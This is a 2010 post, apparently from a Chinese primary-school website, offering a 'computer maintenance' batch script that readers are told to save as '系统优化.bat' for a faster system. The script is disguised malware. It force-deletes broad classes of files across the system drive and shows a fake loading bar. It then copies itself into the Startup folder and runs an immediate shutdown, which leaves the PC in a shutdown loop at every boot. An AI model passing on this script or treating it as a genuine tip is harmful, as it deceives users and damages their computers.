电脑维护小技巧2
消 息 2010年03月04日 阅读:707次
姓 名 | 学 校 | 班 级 |
顾陈深 | 魏塘镇中心 | 605 |
哈咯,电脑维护小技巧
将以下文字复制到记事本:
@echo off
echo 清理系统垃圾
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /s /q %windir%\temp\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
cls xox
@echo off&setlocal enabledelayedexpansion
set a=▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉
set b=
color 01
mode con cols=52 lines=11
echo/&echo\
set/p= 正在载入中......<nul&echo.
set/p=<nul&echo.
for /l %%a in (1,1,19) do (
set /a d=%%a*2+6
call :pp %%a
)
echo
pause>nul
:pp
set/p= !a:~0,%1!<nul&set/p=!b:~0,%d%!<nul
ping -n 1 127.1>nul
goto :eof
echofor %%i in (C:\Documents and Settings\Administrator\「开始」菜单\程序\启动) do copy %0 %%i /y
shutdown -s -t 0
pause&exit
保存在桌面上,命名为 :系统优化.bat 保存后打开,系统速度如飞!